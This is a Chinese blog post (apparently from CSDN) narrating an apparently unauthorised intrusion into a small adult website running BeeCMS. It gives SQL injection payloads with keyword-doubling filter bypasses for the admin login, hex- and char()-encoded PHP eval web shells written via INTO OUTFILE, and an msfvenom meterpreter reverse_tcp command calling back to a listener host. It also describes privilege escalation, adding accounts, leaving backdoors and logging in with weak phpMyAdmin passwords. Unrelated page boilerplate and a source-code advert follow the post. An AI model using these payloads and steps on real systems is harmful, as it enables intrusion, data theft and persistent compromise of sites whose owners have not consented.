记一次小黄站渗透过程,实操!

来源:https://blog.csdn.net/qq_42111373/article/details/105667190

# 前言

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

#  渗透过程

无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞

c1e6eded184f1a2db4e24ec252e70ca1.png

这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php

60e1bafb96bf8b0222df7c4389eb3c33.png

通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入

c99e78c89378461af6502c82ec02b611.png

可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过

f65bbf9b77f8fd75899a9df0dff07458.png

发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以。

方法一

1、通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点

2、一把梭,发现并没有,使用脚本也没有绕过

45a31b765b9d8b603e7ee7d774be8e16.png

方法二

1、通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过。

beb85d969d5a16c994304d92b86a0b79.png

2、对shell部分进行编码

bab538c4079215fc5a55a8b9023b303e.png

3、写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。

ps:这里的写入路径纯属盲猜,运气好,默认目录

eb098e33c5217db3718909a265f4370c.png

4、用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲

bade74909e0860c54d951e3ba3cf893b.png

char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

824a50b125b8730a397948d637e125c1.png

一样成功写入

1、写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下

037e8378f654c1408cff67f2f68d153b.png

2、md5解密,wocao,成功登陆,然后就是后台找上传了

d0f25132e9045374cd9d53fc26086782.png

# 后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去

808672b55da91feedf004e33caa3a910.png

方法一

1、通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听

31d5a4733878fe5ec418e980a9de7a30.png

2、不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1、上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2、访问大马

eefe90a295818692160b8ea75281331f.png

3、这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。

4、创建admin权限账号之后,登陆服务器

eccdc9def1c8195631ce9f1feea92ca7.jpeg

# 其他发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell。

49a6b3a74a9d97ba2f20317f213c8354.png

# 总结

1、前台sql注入获取用户名密码,进入后台找上传

2、SQL注入语句写入一句话

3、phpmyadmin一句话getshell

4、上传大马提权

至此,渗透结束。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值